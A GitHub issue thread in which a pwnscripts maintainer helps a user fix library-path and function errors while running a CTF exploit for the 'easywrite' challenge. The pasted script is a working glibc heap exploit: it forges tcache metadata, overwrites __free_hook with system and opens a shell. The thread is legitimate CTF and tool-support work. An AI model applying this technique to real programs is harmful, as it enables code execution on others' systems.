### ISSUE TITLE
AttributeError: 'ContextType' object has no attribute 'libc_database'

### ISSUE THREAD

**Issue by pureGavin** [152334H/pwnscripts#9]
here is my code:
context.libc_database = '/home/gavin/libc-database/db'
there is an error when i run this code:
Traceback (most recent call last):
    File "easywrite.py", line 5, in <module>
      context.libc_database = '/home/gavin/libc-database/db'
AttributeError: 'ContextType' object has no attribute 'libc_database'
i already use 'https://github.com/niklasb/libc-database' to download all libc , what should i do next?

**Comment by Kyle-Kyle** [comment]
Saw your writeup about easywrite.
About running with different libc, here is what I wrote before apart from what you wrote on ctftime.

~~~ 
There are several ways to resolve this issue:
1. Set up a ubuntu18-04 docker environment
2. Use patchelf to change the path of interpreter and and library path
3. (The ugly way but the way i used most frequently other than docker) use vim to edit the binary directly to change the interpreter to ./ld.so and libc to ./libcccc (it's ./libcccc because it has the same number of letters as libc.so.6)
4. Run the binary as LD_PRELOAD=./libc.so.6 ./ld.so <challenge>. But this method will treat the challenge as a library so you end up with a different memory layout from normal execution
~~~

**Comment by pureGavin** [comment]
> Saw your writeup about easywrite.
> About running with different libc, here is what I wrote before apart from what you wrote on ctftime.
> 
> ```
> There are several ways to resolve this issue:
> 1. Set up a ubuntu18-04 docker environment
> 2. Use patchelf to change the path of interpreter and and library path
> 3. (The ugly way but the way i used most frequently other than docker) use vim to edit the binary directly to change the interpreter to ./ld.so and libc to ./libcccc (it's ./libcccc because it has the same number of letters as libc.so.6)
> 4. Run the binary as LD_PRELOAD=./libc.so.6 ./ld.so <challenge>. But this method will treat the challenge as a library so you end up with a different memory layout from normal execution
> ```

do i have to use docker? cause i am not always use docker to do anything ; and about  four way that you told me , don't know what you talking about , the problem is about python script file not binary file , what should i do about 'context.libc_database' the path is right

**Comment by Kyle-Kyle** [comment]
no. each of them is a separate method to achieve the same thing.

**Comment by Kyle-Kyle** [comment]
Ah. I mentioned the four methods because you left this url as the "ping you" link about how to run a binary with different libc

**Comment by 152334H** [comment]
> here is my code:
> context.libc_database = '/home/gavin/libc-database/db'
> there is an error when i run this code:
> Traceback (most recent call last):
> File "easywrite.py", line 5, in
> context.libc_database = '/home/gavin/libc-database/db'
> AttributeError: 'ContextType' object has no attribute 'libc_database'
> i already use 'https://github.com/niklasb/libc-database' to download all libc , what should i do next?

That's really weird! Could you give a bit more info, particularly
 * Is that (line 5) the only line changed in `easywrite.py`?
 * What `pwnscripts` version is being used

**Comment by pureGavin** [comment]
> Ah. I mentioned the four methods because you left this url as the "ping you" link about how to run a binary with different libc

do i? sorry, this is me first time to ask something on github :(

**Comment by 152334H** [comment]
> Saw your writeup about easywrite.

@Kyle-Kyle, thanks a lot! I've also tried the ugly vim way sometimes; it's the closest I've gotten to getting the memory layout expected from actual execution.

Currently `pwnscripts` runs `./ld-linux.so`, which also produces a wrong memory layout (like your method 4); methods 2/3 look like a nice alternative for a future update.

**Comment by pureGavin** [comment]
> > here is my code:
> > context.libc_database = '/home/gavin/libc-database/db'
> > there is an error when i run this code:
> > Traceback (most recent call last):
> > File "easywrite.py", line 5, in
> > context.libc_database = '/home/gavin/libc-database/db'
> > AttributeError: 'ContextType' object has no attribute 'libc_database'
> > i already use 'https://github.com/niklasb/libc-database' to download all libc , what should i do next?
> 
> That's really weird! Could you give a bit more info, particularly
> 
> * Is that (line 5) the only line changed in `easywrite.py`?
> * What `pwnscripts` version is being used

i use the latest version of pwnscripts ; and that is all script code(really long):
`from pwnscripts import *
from struct import *
from pwn import *
context.binary = './easywrite'
context.libc_database = '/home/gavin/libc-database/db'
context.libc = './libc-2.31.so'

#r = remote('124.156.183.246', 20000)
r=process('./easywrite')
context.libc.calc_base('setbuf', unpack_hex(r.recvline()))

def tcache_perthread_struct(fake_ptrs: dict):
    '''fake_ptrs has (address: size) key-pairs'''
    def csize2tidx(x): return (x-1)//16 -1
    TCACHE_MAX_BINS = 0x40

    counts = [0 for _ in range(TCACHE_MAX_BINS)]
    entries = [0 for _ in range(TCACHE_MAX_BINS)]
    for addr,size in fake_ptrs.items():
        tidx = csize2tidx(size)
        counts[tidx] += 1
        entries[tidx] = addr
    return b''.join(map(p16,counts)) + b''.join(map(p64,entries))

SIZE = 0x40 # size of the 2nd allocation
tcache_pointer = 0x7f638ae58530-0x00007f638ac65000+context.libc.address-0x40
fake_tcache = tcache_perthread_struct({context.libc.symbols['__free_hook']-0x8: SIZE})

r.sendafter('Input your message:', fake_tcache)
r.sendafter('Where to write?:', pack(tcache_pointer))
r.sendafter('Any last message?:', b'/bin/sh\0' + pack(context.libc.symbols['system']))
r.interactive()`

**Comment by pureGavin** [comment]
> > here is my code:
> > context.libc_database = '/home/gavin/libc-database/db'
> > there is an error when i run this code:
> > Traceback (most recent call last):
> > File "easywrite.py", line 5, in
> > context.libc_database = '/home/gavin/libc-database/db'
> > AttributeError: 'ContextType' object has no attribute 'libc_database'
> > i already use 'https://github.com/niklasb/libc-database' to download all libc , what should i do next?
> 
> That's really weird! Could you give a bit more info, particularly
> 
> * Is that (line 5) the only line changed in `easywrite.py`?
> * What `pwnscripts` version is being used

the others code is not important , only about 'context.libc_database'

**Comment by 152334H** [comment]
@pureGavin, two things
1. Try using ["```"](https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#quoting-code) to prettify your code :p
2. What happens when you remove the lines `from struct import *` and `from pwn import *`?

**Comment by pureGavin** [comment]
> @pureGavin, two things
> 
> 1. Try using ["```"](https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#quoting-code) to prettify your code :p
> 2. What happens when you remove the lines `from struct import *` and `from pwn import *`?

1. sorry about the code , i don't know how to use github's edit
2. this is what happen 'OSError: '/home/gavin/libc-database/db' does not appear to be a libc-database/ folder.' ;  i use ./get ubuntu command to download , and the path is right , what else should i do about libc-database file ? and here is all msg:
Traceback (most recent call last):
  File "easywrite.py", line 6, in <module>
    context.libc = './libc-2.31.so'
  File "/home/gavin/pwnscripts/pwnscripts/context.py", line 106, in __setattr__
    return setattr(_pwnscripts_context, attr, value)
  File "/usr/local/lib/python3.8/dist-packages/pwnlib/context/__init__.py", line 174, in fset
    self._tls[name] = validator(self, val)
  File "/home/gavin/pwnscripts/pwnscripts/context.py", line 78, in libc
    return pwnscripts.libc(binary=assigned)
  File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 321, in __init__
    id = self.db.id(binary)
  File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 251, in id
    return self.identify(binary)[:-1].decode()
  File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 274, in default
    raise IOError('%r does not appear to be a libc-database/ folder.' % self.db_dir)
OSError: '/home/gavin/libc-database/db' does not appear to be a libc-database/ folder.

**Comment by 152334H** [comment]
> ` 'OSError: '/home/gavin/libc-database/db' does not appear to be a libc-database/ folder.'`

There's the issue then.

The example at the front page is, `context.libc_database = '/path/to/libc-database'`.

Try changing your current code to
```python
context.libc_database = '/home/gavin/libc-database'
```

**Comment by pureGavin** [comment]
> > ` 'OSError: '/home/gavin/libc-database/db' does not appear to be a libc-database/ folder.'`
> 
> There's the issue then.
> 
> The example at the front page is, `context.libc_database = '/path/to/libc-database'`.
> 
> Try changing your current code to
> 
> ```python
> context.libc_database = '/home/gavin/libc-database'
> ```

YES!!! problem has been solved!!!
and there is a new problem...
NameError: name 'unpack_hex' is not defined
do you know anything about unpack_hex() func?

**Comment by pureGavin** [comment]
> > ` 'OSError: '/home/gavin/libc-database/db' does not appear to be a libc-database/ folder.'`
> 
> There's the issue then.
> 
> The example at the front page is, `context.libc_database = '/path/to/libc-database'`.
> 
> Try changing your current code to
> 
> ```python
> context.libc_database = '/home/gavin/libc-database'
> ```

is unpack_hex() from pwnscripts or struct ?

**Comment by 152334H** [comment]
> YES!!! problem has been solved!!!
> and there is a new problem...
> NameError: name 'unpack_hex' is not defined
> do you know anything about unpack_hex() func?

Oh. Oops.

For now, you can try replacing `unpack_hex()` with `extract_first_hex()`.

Extraneous info: `unpack_hex()` is a feature from the pwnscripts-dev branch (i.e. it's from a half-way finished update). It's not going to get published to master that soon, so you should just follow the suggestion above (to replace with `extract_first_hex`).

**Comment by pureGavin** [comment]
> > YES!!! problem has been solved!!!
> > and there is a new problem...
> > NameError: name 'unpack_hex' is not defined
> > do you know anything about unpack_hex() func?
> 
> Oh. Oops.
> 
> For now, you can try replacing `unpack_hex()` with `extract_first_hex()`.
> 
> Extraneous info: `unpack_hex()` is a feature from the pwnscripts-dev branch (i.e. it's from a half-way finished update). It's not going to get published to master that soon, so you should just follow the suggestion above (to replace with `extract_first_hex`).

OK , i will replacing it 
about unpack_hex() func , will you finish it anytime?

**Comment by 152334H** [comment]
> about unpack_hex() func , will you finish it anytime?

No ETA on that. I'm having exams (!) atm, so broadly it might come in a month or two.

**Comment by pureGavin** [comment]
> > YES!!! problem has been solved!!!
> > and there is a new problem...
> > NameError: name 'unpack_hex' is not defined
> > do you know anything about unpack_hex() func?
> 
> Oh. Oops.
> 
> For now, you can try replacing `unpack_hex()` with `extract_first_hex()`.
> 
> Extraneous info: `unpack_hex()` is a feature from the pwnscripts-dev branch (i.e. it's from a half-way finished update). It's not going to get published to master that soon, so you should just follow the suggestion above (to replace with `extract_first_hex`).

em.......  doesn't work :(
do you have something like man page or PDF file to introduce extract_first_hex() func and unpack_hex() func? i will know what's wrong with my code if i know what func it is

**Comment by pureGavin** [comment]
> > YES!!! problem has been solved!!!
> > and there is a new problem...
> > NameError: name 'unpack_hex' is not defined
> > do you know anything about unpack_hex() func?
> 
> Oh. Oops.
> 
> For now, you can try replacing `unpack_hex()` with `extract_first_hex()`.
> 
> Extraneous info: `unpack_hex()` is a feature from the pwnscripts-dev branch (i.e. it's from a half-way finished update). It's not going to get published to master that soon, so you should just follow the suggestion above (to replace with `extract_first_hex`).

and about error msg:
Traceback (most recent call last):
  File "easywrite.py", line 10, in <module>
    context.libc.calc_base('setbuf', extract_first_hex(r.recvline()))
  File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 362, in calc_base
    assert is_base_address(self.address)   # check that base addr is reasonable
AssertionError

**Comment by 152334H** [comment]
>```python
>Traceback (most recent call last):
>File "easywrite.py", line 10, in
>context.libc.calc_base('setbuf', extract_first_hex(r.recvline()))
>File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 362, in calc_base
>assert is_base_address(self.address) # check that base addr is reasonable
>AssertionError
>```

Thanks for providing the error trace.

That's not an issue with `extract_first_hex`. That error means that the libc address the program gave doesn't match up with the libc version pwnscripts was provided. Case in point, your code 
```python
r=process('./easywrite')
```
**Doesn't** run the program with `libc-2.31.so` (which, is another thing that I would like to have changed in a future update, but that's neither here nor there). You should change the offending line to,
```python
r = context.binary.process()
```
The context.binary is used to indicate that the runtime should follow everything else set previously for `context` (like `context.libc = ...`)

**Comment by 152334H** [comment]
Also,
> do you have something like man page or PDF file to introduce extract_first_hex() func and unpack_hex() func? i will know what's wrong with my code if i know what func it is

Most functions come with [docstrings](https://www.python.org/dev/peps/pep-0257/)! You can usually find information about the functions/classes/variables/etc in pwnscripts by just running (in the python shell)
```python
>>> from pwnscripts import *
>>> help(extract_first_hex)  # or any other function in pwnscripts
```
or in a terminal, `pydoc3.8 pwnscripts.myfunction`.

[Note: you won't find documentation for `unpack_hex()`, because it's not inside your version of pwnscripts at all.]

**Comment by pureGavin** [comment]
> Also,
> 
> > do you have something like man page or PDF file to introduce extract_first_hex() func and unpack_hex() func? i will know what's wrong with my code if i know what func it is
> 
> Most functions come with [docstrings](https://www.python.org/dev/peps/pep-0257/)! You can usually find information about the functions/classes/variables/etc in pwnscripts by just running (in the python shell)
> 
> ```python
> >>> from pwnscripts import *
> >>> help(extract_first_hex)  # or any other function in pwnscripts
> ```
> 
> or in a terminal, `pydoc3.8 pwnscripts.myfunction`.
> 
> [Note: you won't find documentation for `unpack_hex()`, because it's not inside your version of pwnscripts at all.]

well...... thing going blue....
here is error msg:
import pwnscripts
 help(extract_first_hex)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'extract_first_hex' is not defined

**Comment by 152334H** [comment]
`import pwnscripts` isn't `from pwnscripts import *`

**Comment by pureGavin** [comment]
> `import pwnscripts` isn't `from pwnscripts import *`

i don't wanna complain but do you finish pwnscripts ? i mean 'context' is not easy for me...
here is error msg:
Traceback (most recent call last):
  File "easywrite.py", line 10, in <module>
    r=context.binary.process('./easywrite')
  File "/home/gavin/pwnscripts/pwnscripts/elf.py", line 26, in process
    return context.libc.run_with(self, argv, *a, **kw)
  File "/home/gavin/pwnscripts/pwnscripts/libcdb_query.py", line 432, in run_with
    return process([ld_linux, '--library-path', lib_dir, binary.path]+argv, *a, **kw)
TypeError: can only concatenate list (not "str") to list

**Comment by 152334H** [comment]
> `r=context.binary.process('./easywrite')`

>> You should change the offending line to,
>> `r = context.binary.process()`

**Comment by pureGavin** [comment]
> > `r=context.binary.process('./easywrite')`
> 
> > > You should change the offending line to,
> > > `r = context.binary.process()`

everything is work for me!!! thanks for help!!!  :)
and also @Kyle-Kyle thanks for help :)
and about pwnscripts update , if you need some help , i think i can help you or join you to make pwnscripts better :p

**Comment by pureGavin** [comment]
> > `r=context.binary.process('./easywrite')`
> 
> > > You should change the offending line to,
> > > `r = context.binary.process()`

maybe finish unpack_hex() func is a good start :p

**Comment by 152334H** [comment]
> and about pwnscripts update , if you need some help , i think i can help you or join you to make pwnscripts better :p

Feel free to make a [pull request](https://github.com/152334H/pwnscripts/pulls) (and read the relevant [contributing instructions](https://github.com/152334H/pwnscripts/blob/master/CONTRIBUTING.md) first) if you feel you can help.

If there's no other issue, I'll be closing this.
